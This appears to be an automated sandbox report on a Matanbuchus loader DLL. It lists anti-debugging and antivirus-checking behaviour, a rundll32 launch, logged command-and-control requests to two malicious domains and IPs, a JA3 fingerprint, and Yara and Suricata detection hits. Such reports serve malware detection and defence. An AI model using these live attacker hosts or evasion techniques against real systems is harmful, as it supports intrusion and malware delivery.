Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB430 mov edx, dword ptr fs:[00000030h]	34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB430 mov eax, dword ptr fs:[00000030h]	34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB430 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBB430
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov eax, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC4560 mov edx, dword ptr fs:[00000030h]	34_2_7EEC4560
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBE390 mov edx, dword ptr fs:[00000030h]	34_2_7EEBE390
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEA6330 mov ecx, dword ptr fs:[00000030h]	34_2_7EEA6330
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE86ED0 mov edx, dword ptr fs:[00000030h]	34_2_7EE86ED0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEF7EBB mov eax, dword ptr fs:[00000030h]	34_2_7EEF7EBB
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEF7E46 mov eax, dword ptr fs:[00000030h]	34_2_7EEF7E46
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC7F60 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC7F60 mov edx, dword ptr fs:[00000030h]	34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC7F60 mov eax, dword ptr fs:[00000030h]	34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEC7F60 mov ecx, dword ptr fs:[00000030h]	34_2_7EEC7F60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEB9C60 mov eax, dword ptr fs:[00000030h]	34_2_7EEB9C60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE8BC30 mov edx, dword ptr fs:[00000030h]	34_2_7EE8BC30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE8BC30 mov eax, dword ptr fs:[00000030h]	34_2_7EE8BC30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE66DAA mov eax, dword ptr fs:[00000030h]	34_2_7EE66DAA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE87DB0 mov eax, dword ptr fs:[00000030h]	34_2_7EE87DB0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE66D10 mov eax, dword ptr fs:[00000030h]	34_2_7EE66D10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEDFA90 mov eax, dword ptr fs:[00000030h]	34_2_7EEDFA90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE87A60 mov edx, dword ptr fs:[00000030h]	34_2_7EE87A60
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE86B80 mov edx, dword ptr fs:[00000030h]	34_2_7EE86B80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEA4B90 mov ecx, dword ptr fs:[00000030h]	34_2_7EEA4B90
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE66B00 mov edx, dword ptr fs:[00000030h]	34_2_7EE66B00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE948E0 mov ecx, dword ptr fs:[00000030h]	34_2_7EE948E0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE83992 mov edx, dword ptr fs:[00000030h]	34_2_7EE83992
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64664 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64664
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64664 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64664
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64664 mov edx, dword ptr fs:[00000030h]	34_2_7EE64664
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE79790 mov edx, dword ptr fs:[00000030h]	34_2_7EE79790
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE79790 mov ecx, dword ptr fs:[00000030h]	34_2_7EE79790
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE79790 mov ecx, dword ptr fs:[00000030h]	34_2_7EE79790
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBA730 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBA730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBA730 mov eax, dword ptr fs:[00000030h]	34_2_7EEBA730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBA730 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBA730
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBD5B0 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBD5B0 mov eax, dword ptr fs:[00000030h]	34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBD5B0 mov ecx, dword ptr fs:[00000030h]	34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBD5B0 mov edx, dword ptr fs:[00000030h]	34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBD5B0 mov eax, dword ptr fs:[00000030h]	34_2_7EEBD5B0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE8757D mov eax, dword ptr fs:[00000030h]	34_2_7EE8757D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBE570 mov eax, dword ptr fs:[00000030h]	34_2_7EEBE570
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE8C230 mov eax, dword ptr fs:[00000030h]	34_2_7EE8C230
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBE380 mov eax, dword ptr fs:[00000030h]	34_2_7EEBE380
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBC340 mov eax, dword ptr fs:[00000030h]	34_2_7EEBC340
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov ecx, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov eax, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE651EF mov edx, dword ptr fs:[00000030h]	34_2_7EE651EF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE67160 mov edx, dword ptr fs:[00000030h]	34_2_7EE67160
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64174 mov edx, dword ptr fs:[00000030h]	34_2_7EE64174
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64174 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64174
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEBB130 mov eax, dword ptr fs:[00000030h]	34_2_7EEBB130
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov edx, dword ptr fs:[00000030h]	34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov ecx, dword ptr fs:[00000030h]	34_2_7EE64110
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EE64110 mov edx, dword ptr fs:[00000030h]	34_2_7EE64110

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_7F35B5AE CreateMutexA,GetProcessHeap,lstrlenW,GetFocus,GetMenu,GetSubMenu,GetModuleHandleA,GetOEMCP,IsWow64Message,SetLastError,IsValidCodePage,GetModuleHandleA,lstrlenA,IsValidCodePage,GetLastError,lstrlenA,lstrlenW,IsValidCodePage,IsValidCodePage,GetFocus,GetSystemMenu,IsValidCodePage,CloseHandle,GetFocus,IsWindow,ArrangeIconicWindows,

14_2_7F35B5AE

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_6D0AAAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_6D0AAAFD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_7F3D1B15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_7F3D18C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_7F3D5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_7F3D5753
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	18_2_7EDE1B15
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_7EDE18C7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_7EDE5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	18_2_7EDE5753
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_6B86AAFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_6B86AAFD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE1B15 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	34_2_7EEE1B15
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE18C7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_7EEE18C7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 34_2_7EEE5753 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	34_2_7EEE5753

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 193.109.85.27 443			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 193.109.85.31 54801

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\file.dll",#1

Contains functionality to query CPU information (cpuid)

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_7EDE167C cpuid

18_2_7EDE167C

Contains functionality to query locales information (e.g. system language)

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_7F3EAF2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_7F3EAB24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_7F3EAA3E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_7F3EAA89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	14_2_7F3E485C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	14_2_7F3EA79C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	14_2_7F3E42DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_7F3EB100
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	18_2_7EDFAF2B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	18_2_7EDFAA89
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	18_2_7EDFAA3E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	18_2_7EDFAB24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	18_2_7EDF485C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	18_2_7EDFA79C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	18_2_7EDF42DF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	18_2_7EDFB100
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	34_2_7EEFAF2B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	34_2_7EEFAA89
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	34_2_7EEFAA3E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	34_2_7EEFAB24
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoW,	34_2_7EEF485C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetACP,IsValidCodePage,GetLocaleInfoW,	34_2_7EEFA79C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesW,	34_2_7EEF42DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	34_2_7EEFB100

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 18_2_7EDE19E4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

18_2_7EDE19E4

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Source: C:\Windows\SysWOW64\rundll32.exe	WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.109.85.27	semurox.com	Russian Federation		9009	M247GB	true
193.109.85.31	vilodeqa.com	Russian Federation		9009	M247GB	true

Contacted Domains

Name	IP	Active
semurox.com	193.109.85.27	true
vilodeqa.com	193.109.85.31	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://vilodeqa.com/detalis.aspx	true	0%, Virustotal, Browse	unknown
https://semurox.com/account.aspx	true	8%, Virustotal, Browse	unknown
http://vilodeqa.com/blueoceansite/templates/docs/index.php	true		unknown

AV Detection

Multi AV Scanner detection for domain / URL

Source: https://semurox.com/account.aspx

Virustotal: Detection: 8%

Multi AV Scanner detection for dropped file

Source: C:\Users\user\8f08\user-PC\user-PC.ocx

Virustotal: Detection: 16%

Multi AV Scanner detection for submitted file

Source: file.dll

Virustotal: Detection: 16%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Suricata IDS alerts for network traffic

Source: file.dll

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL

Source: unknown	HTTPS traffic detected: 193.109.85.27:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49710 version: TLS 1.2

Networking

Source: Network traffic	Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49763 -> 193.109.85.31:54801
Source: Network traffic	Suricata IDS: 2034468 - Severity 1 - ET MALWARE Matanbuchus Loader CnC M3 : 192.168.2.7:49994 -> 193.109.85.31:54801

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 193.109.85.27 443			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Network Connect: 193.109.85.31 54801

Detected TCP or UDP traffic on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 49816 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49816
Source: unknown	Network traffic detected: HTTP traffic on port 49992 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 49993 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49992
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49993
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 54801
Source: unknown	Network traffic detected: HTTP traffic on port 54801 -> 49994

Source: global traffic

TCP traffic: 192.168.2.7:49763 -> 193.109.85.31:54801

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: M247GB M247GB
Source: Joe Sandbox View	ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 14_2_7F3B4560 socket,gethostbyname,connect,send,recv,std::ios_base::_Ios_base_dtor,

14_2_7F3B4560

Source: global traffic	HTTP traffic detected: GET /account.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: semurox.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /detalis.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: vilodeqa.comCache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: semurox.com
Source: global traffic	DNS traffic detected: DNS query: vilodeqa.com

Source: unknown

Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 193.109.85.27:443 -> 192.168.2.7:49699 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49701 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49702 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 193.109.85.31:443 -> 192.168.2.7:49710 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: file.dll, type: SAMPLE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: sslproxydump.pcap, type: PCAP	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 34.2.regsvr32.exe.6b810000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.6d050000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.4910000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 22.2.rundll32.exe.6d050000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.4910000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 14.2.rundll32.exe.7f330000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 34.2.regsvr32.exe.7ee40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 18.2.rundll32.exe.7ed40000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000022.00000002.3113971469.000000007EE40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 0000000E.00000002.3111806010.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000022.00000002.3112823931.000000006B811000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000016.00000002.1885875877.000000006D051000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000012.00000002.3112574505.0000000005081000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
Source: 00000022.00000002.3112253212.00000000056DD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
